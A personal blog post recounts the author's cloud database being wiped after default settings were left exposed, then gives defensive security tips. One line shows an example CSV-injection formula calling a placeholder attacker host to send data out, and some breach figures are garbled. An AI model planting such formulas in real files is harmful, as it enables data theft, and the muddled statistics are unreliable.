I got hacked, and it changed my life’s perspective on security. Here’s a compilation of something that happened to me and some security tips to minimize this kind of surprises.
Hack incident
I’ve been very chill about security most of my life. I’m 32, and I never got my social media hacked or emails. However, something that changed when I set up a personal server on the cloud and I got an intruder!
This server was collecting data from financial markets (just for fun and to play with some backtracking strategies). One day, I check the database as usual, and It was empty! I was in shock! What happened!? 👀
I reviewed the authentication logs and found out thousands of attempts to log in to my server! 🤯 I saw efforts from everywhere: France, Rusia, Canada, Germany, China, and other countries! Fortunately, none of this got in. However, I still got hacked. How? 🤔
It turns out that when I set up the database, I didn’t bother to change the default configuration. It wouldn’t do that for work but since it was a personal project and the data was public anyway, so I didn’t care too much. I also thought “Meh, nobody is going to find it. I don’t have this IP published anywhere”. However, I was wrong. People/bots did find it and tons of them!
So I learned the following. There are people/organizations which scan every possible IP address. It doesn’t matter if it is listed anywhere or not. Hackers/bots will scan any known port on every IP address and hope people leave defaults open.
Hackers will try to log in into your server and try very common usernames (pi
, linode
, root
, admin
, etc.) and default passwords. They also attempt to connect to any possible database on their default ports. I was able to see all the attempts from the logs!
I’m glad they drop my database, so I noticed what happened. Hackers could keep login to my server for years, and I probably wouldn’t see for a long time. Many companies have their servers compromised, and they don’t even know it. When they realized it, it’s already late, and then you see the news about it.
Some examples of data breaches:
- In 2013, Yahoo 3 billion users and Target with 110 credit cards.
- In 2014, Marriott with 500 million guests and eBay with 145 million users.
- In 2017, Equifax with 143 million social security numbers, addresses, and birth dates.
- Even banks get hacked like the JP Morgan Chase on 2014 with 76 million households and 7 million businesses.
- Not even security companies are exempt like RSA Security in 2011 with 40 million employee records stolen.
Security Tips
Cybercriminals are real, and everything that you have connected to the Internet is their target. No company or person can 100% prevent getting hacked. However, you can make it way more difficult and reduce the chances to 1 in 1000 years, which is pretty good.
For instance, your password length and unique character alone can tell how long it would take to break it:
- If your password is
Password
takes around 0.29 seconds to break. - If your password is
P@ssw0rd
takes around 14 years. - If your password has 12 characters
abcdefghijkl
it takes 200 years to generate it. - This password
P@ssw0rd123456!!
would take more than hundreds of thousand years to decipher.
Here are my security tips on how to minimize hacking. It goes from generic usable for mostly everyone to server setup recommendations.
Generic tips
- Use different passwords for everything. If you use the same password for everything some website gets compromised (e.g., Amazon), then everything that has the same user and password will be at risk. I know it’s a hassle to remember all, but you don’t have to. Use a password manager like Bitwarden, 1Password, LastPass, Dashlane or even Google Chrome built-in password manager.
- Use long passwords with special characters. If you are using a password manager, you can ask to auto-generate a secure password.
- Use ** 2-factor authentication** whenever is available.
- Enable all security features on the services that you use.
- Everything that runs arbitrary code on your computer should not be trusted.
- Don’t trust defaults blindly verify if there’s a more secure option.
- Keep all your devices, operating systems and dependencies up-to-date. Most well-known vulnerabilities are fixed shortly after they are reported.
Email security tips
- Have ** 2-factor authentication** on your emails. If someone gets access to your primary email, then they can use
forgot password
on many sites (Evernote, Bank Accounts) and change the password. I heard of somebody that got their email compromised; in turn, the hacker got access to their Evernote and found some passwords to their cryptocurrency exchanges and got robbed big time. Don’t be that guy. Enable 2FA. - Be aware of phishing emails. No, Bill Gates won’t share his fortune and donate you a million, nor you won any lottery. Don’t trust any email saying that you won money or any price. Also, be aware of fake company emails asking for you to log in somewhere. The site might look very similar, but it’s a trap! They want to capture your password. Check the domain carefully or even better yet don’t click on any link from the email and type your company web address directly as you usually do.
- Be aware of malicious attachments. Specially executables (*.exe, *.bat, *.sh, *.zip). See also Microsoft documents part. Everything that can run arbitrary code on your computer should not be trusted.
Social Media
- Enable all the security options they have like 2 Factor authentication, SMS confirmation.
- Don’t share passwords with your friends or change them afterwards.
Microsoft Documents
- If you use your documents locally or by trusted peers, you shouldn’t have many problems. However, for auto-generated documents like (*.csv) that you download from emails or compromised websites they can change data or insert malicious links (
=HYPERLINK("[http://attacker.com?some='data](http://attacker.com/?some=%27data%27)')
) and take you to their websites. - Be aware of macros. They are code that automatically runs when you open the program. In modern versions, Office alerts you when a doc has a macro, and now they are disabled by default.
Wifi security tips
- Use a password for your wifi. If you leave it open anybody connects to it can have access to your computers, cell phones, tablets, and smart fridge or cameras.
- Use strong encryption for Wifi. Don’t use WEP encryption. Use WPA or the newer WPA2. WEP can be cracked relatively quickly using some programs.
- Use a strong password. It makes it harder to break.
- Provide a separate network for guests, so your connected devices are not exposed nor your router.
- If you use public wifi, consider using a VPN. Hotspot operators and ISPs can snoop into your traffic, but if you use a VPN, they won’t be able to.
- If you are very paranoid or are working with something top secret. Here are some advanced options:
- Have a hidden Wi-fi (SSID) and don’t broadcast it. You will need the name to connect to it.
- Restrict access by MAC address list. This list will allow only the devices in there to connect to the network.
- Shutdown your network when is not in used. It’s a little extreme, but that’s the ultimate security measure or use wired connections.
Developers security tips
- Keep all your operating systems and dependencies up-to-date. Maintainers usually patch their software after vulnerabilities come to light.
- Use latest encryption protocols TLS (rather than older SSL versions)
- Use SFTP instead of FTP
- Use SSH instead of telnet
- Use HTTPS instead of HTTP. You can encrypt for free with Let’s Encrypt.
- Disable direct root login in SSH. You can escalate if needed using
sudo
. - Disable SSH connection with passwords. Use ssh private key to log in instead.
- Use firewalls to block any port that you are not using. Firewalls minimize the surface of attack. For Linux, you can use
UFW
; another option isiptables
. - Use VPN and private networks. If you don’t need to expose a database to the internet, even better. Make it only accessible for your private network or VPN.
- Don’t trust the default configuration of programs facing the internet. Change default ports on databases, ssh.
- Instead of logging
ssh
on port22
. Use port2146
for instance. I did this and noticed how the attempts of login went from hundreds to zero. - Instead of running MongoDB on port
27017
, use56073
- Instead of logging
- Change default user/passwords. Remove default users (e.g., RaspberryPi comes with the
pi
user that allow people to login into it, change it!) - Enable authorization on your databases (use passwords). Don’t leave them wide open to the world (and hackers).
- Remove default accounts in your databases. E.g., MySQL
- Keep backups (nightly?)
- Automate monitoring and alert reports. Nobody has time to be glued to logs every time. However, you should set alerts when certain events happen.
- Alerts for failed attempts of login
zcat /var/log/auth.log.*.gz | grep 'sshd' | grep 'exceeded\|Invalid' | cut -d: -f4- | sort | uniq -c | sort -rn
- Monitor your database logs for anomalies, such as dropping database commands.
- Alerts for failed attempts of login
- Be aware of package managers. To name a few Node’s NPM, Ruby Gems and Mac’s brew.sh. If someone gets access to the administrator password of popular packages you might be at risk.
- NPM has scripts that can run arbitrary code when you install packages. Take a look at postinstall. Similarly, Ruby Gems has a
post_install
hook. This script has access to your whole file system, ssh keys and nothing prevent them from sending them to a remote server. Just be aware. - Brew.sh adds binaries on your
/usr/local
and modifies thePATH
, so this location has the preference. That change could make malicious programs run before the original program.
- NPM has scripts that can run arbitrary code when you install packages. Take a look at postinstall. Similarly, Ruby Gems has a
- Finally, never trust anything that comes from the user/internet. If you are running a web form, sanitize the inputs (strip out malicious scripts).
Be safe!